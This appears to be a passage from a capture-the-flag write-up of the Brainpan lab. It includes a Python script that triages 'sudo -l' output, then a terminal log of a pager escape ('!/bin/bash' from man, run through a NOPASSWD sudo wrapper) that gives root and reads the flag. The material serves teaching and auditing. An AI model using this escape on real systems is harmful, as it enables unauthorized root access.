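As an added example (not from the writeup), here is the triage a practitioner would script over sudo -l output to surface rules like this one quickly. It parses the rule lines, then flags what made this case exploitable: the rule is NOPASSWD, the target lives under /home rather than a system directory, and, for rules that name a binary directly, the binary is on GTFOBins' sudo list. The sample input is the output captured above; the GTFOBins subset is a hand-picked assumption, and a wrapper like anansi_util is only caught by the path heuristic, since what it ultimately execs has to be checked by running it.

```python
"""Added example: triage `sudo -l` output for privilege-escalation leads.
Not from the writeup; the GTFOBins subset below is a hand-picked assumption."""
import re
from pathlib import PurePosixPath

# Sample input: the `sudo -l` output captured above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
"""

# Illustrative subset of binaries GTFOBins documents under "sudo": pagers and
# editors that honour `!cmd`, plus a few that take an -exec/system() argument.
GTFOBINS_SUDO = {"man", "less", "more", "vi", "vim", "nano", "find", "awk", "python"}

SYSTEM_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin")

# "(root) NOPASSWD: /path/one, /path/two"  ->  runas, tags, comma-separated commands
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per command from the 'may run the following' section."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def assess(rule):
    """Findings worth a manual look for one rule, most decisive first."""
    findings = []
    if rule["command"] == "ALL":
        findings.append("ALL: any command as " + rule["runas"])
    else:
        path = PurePosixPath(rule["command"].split()[0])
        if path.name in GTFOBINS_SUDO:
            findings.append("gtfobins:" + path.name)
        if not any(str(path).startswith(d + "/") for d in SYSTEM_DIRS):
            findings.append("outside system dirs: check who can write it and what it execs")
    if rule["nopasswd"]:
        findings.append("NOPASSWD")
    return findings


def audit(text):
    """(runas, command, findings) for every rule in the sudo -l output."""
    return [(r["runas"], r["command"], assess(r)) for r in parse_sudo_l(text)]


if __name__ == "__main__":
    for runas, cmd, findings in audit(SUDO_L_OUTPUT):
        print("(%s) %s -> %s" % (runas, cmd, ", ".join(findings) or "nothing obvious"))
```

On this box the only rule is flagged twice (NOPASSWD, binary under /home), which is exactly the cue to run the wrapper and see what it hands off to; the man invocation it makes is what turns the rule into a root shell.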

puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man
sudo /home/anansi/bin/anansi_util manual man
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# whoami
whoami
root

Root obtained.

flag

root@brainpan:/usr/share/man# cd /root
cd /root
root@brainpan:~# ls
ls
b.txt
root@brainpan:~# cat b.txt
cat b.txt
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

                                              http://www.techorganic.com 

root@brainpan:~#